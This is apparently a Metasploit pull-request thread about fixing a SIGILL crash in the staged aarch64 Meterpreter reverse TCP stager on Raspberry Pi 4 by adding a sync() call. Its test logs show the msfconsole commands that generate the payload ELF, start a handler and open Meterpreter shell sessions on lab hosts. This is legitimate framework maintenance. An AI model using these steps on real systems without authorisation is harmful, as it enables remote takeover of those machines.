Fix SIGILL on staged meterpreter on RaspberryPi4

[dledda-r7]

This PR fixes: this issue

ISSUE

Inside the read_loop the read syscall get the data from the socket file descriptor and write it to the new memory.
When we are executing the payload with ./metsrv we get a SIGILL on the start of MMAP, if we run the program using strace, the program works flowlessly.
The issue was identified by @h00die-gr3y on this pr

FIX

The fix is simply adding a sync() syscall after each read() to enforce cache flushing (?). I still have no idea why it works but it does.

[bwatters-r7]

msf6 payload(cmd/linux/https/x64/meterpreter_reverse_tcp) > use payload/linux/aarch64/meterpreter/reverse_tcp 
msf6 payload(linux/aarch64/meterpreter/reverse_tcp) > set lhost 10.5.135.201
lhost => 10.5.135.201
msf6 payload(linux/aarch64/meterpreter/reverse_tcp) > generate -f elf -o revtcp_aarch64_4444.staged
[*] Writing 348 bytes to revtcp_aarch64_4444.staged...
msf6 payload(linux/aarch64/meterpreter/reverse_tcp) > to_handler
[*] Payload Handler Started as Job 0
msf6 payload(linux/aarch64/meterpreter/reverse_tcp) > 
[*] Started reverse TCP handler on 10.5.135.201:4444 
[*] Transmitting intermediate midstager...(256 bytes)
[*] Sending stage (953388 bytes) to 10.5.134.142
[*] Meterpreter session 1 opened (10.5.135.201:4444 -> 10.5.134.142:51044) at 2025-02-12 15:06:25 -0600
msf6 payload(linux/aarch64/meterpreter/reverse_tcp) > sessions -i -1
[*] Starting interaction with 1...

meterpreter > sysinfo
Computer     : 10.5.134.142
OS           : Debian  (Linux 5.15.44-Re4son-v8l+)
Architecture : aarch64
BuildTuple   : aarch64-linux-musl
Meterpreter  : aarch64/linux
meterpreter > 

[bwatters-r7]

Yeah; I'm not trilled with this, but it does work. This bug has only been seen on RPi4B, and to the best of my knowledge, the read() syscall should not be asynchronous.... but when we run it, the data we expect is not there when we jump into the buffer. To my knowledge, we don't have to do this with any other payload stager.
The ubiquity of RPis is enough that adding this 16 extra bytes to support it makes sense, but I don't doubt that in 5 years, someone's going to git blame, then come back here and wonder what the heck we were thinking because we really should not need that sync(). If that's you, hello from the past! 👋
In this case, sync() fixes the behavior, but it may be as useful as any other syscall that causes a brief pause in execution that allows the data to populate properly.
Unfortunately, attaching any kind of debugger or forensic tool slows execution enough that we cannot see the bug in action, so we're really just kinda' making our best guess.

[dledda-r7]

Add comment linking the issue

[bwatters-r7]

This is not required on Raspi5:

msf6 payload(linux/aarch64/meterpreter/reverse_tcp) > show options

Module options (payload/linux/aarch64/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


View the full module info with the info, or info -d command.

msf6 payload(linux/aarch64/meterpreter/reverse_tcp) > set lhost 10.5.135.201
lhost => 10.5.135.201
msf6 payload(linux/aarch64/meterpreter/reverse_tcp) > generate -f elf -o revtcp_aarch64_4444.elf
[*] Writing 332 bytes to revtcp_aarch64_4444.elf...
msf6 payload(linux/aarch64/meterpreter/reverse_tcp) > to_handler
[*] Payload Handler Started as Job 0
msf6 payload(linux/aarch64/meterpreter/reverse_tcp) > 
[*] Started reverse TCP handler on 10.5.135.201:4444 
[*] Transmitting intermediate midstager...(256 bytes)
[*] Sending stage (953388 bytes) to 10.5.132.181
[*] Meterpreter session 1 opened (10.5.135.201:4444 -> 10.5.132.181:53530) at 2025-02-13 13:40:25 -0600

msf6 payload(linux/aarch64/meterpreter/reverse_tcp) > sessions -i -1
[*] Starting interaction with 1...

meterpreter > sysinfo
Computer     : 10.5.132.181
OS           : Debian  (Linux 6.6.63-v8+)
Architecture : aarch64
BuildTuple   : aarch64-linux-musl
Meterpreter  : aarch64/linux
meterpreter > getuid
Server username: kali
meterpreter > 

┌──(kali㉿kali-raspberrypi)-[~]
└─$ cat /proc/cpuinfo
processor       : 0
BogoMIPS        : 108.00
Features        : fp asimd evtstrm aes pmull sha1 sha2 crc32 atomics fphp asimdhp cpuid asimdrdm lrcpc dcpop asimddp
CPU implementer : 0x41
CPU architecture: 8
CPU variant     : 0x4
CPU part        : 0xd0b
CPU revision    : 1

processor       : 1
BogoMIPS        : 108.00
Features        : fp asimd evtstrm aes pmull sha1 sha2 crc32 atomics fphp asimdhp cpuid asimdrdm lrcpc dcpop asimddp
CPU implementer : 0x41
CPU architecture: 8
CPU variant     : 0x4
CPU part        : 0xd0b
CPU revision    : 1

processor       : 2
BogoMIPS        : 108.00
Features        : fp asimd evtstrm aes pmull sha1 sha2 crc32 atomics fphp asimdhp cpuid asimdrdm lrcpc dcpop asimddp
CPU implementer : 0x41
CPU architecture: 8
CPU variant     : 0x4
CPU part        : 0xd0b
CPU revision    : 1

processor       : 3
BogoMIPS        : 108.00
Features        : fp asimd evtstrm aes pmull sha1 sha2 crc32 atomics fphp asimdhp cpuid asimdrdm lrcpc dcpop asimddp
CPU implementer : 0x41
CPU architecture: 8
CPU variant     : 0x4
CPU part        : 0xd0b
CPU revision    : 1

Revision        : c04170
Serial          : 5d9ccc98ed7bf5d3
Model           : Raspberry Pi 5 Model B Rev 1.0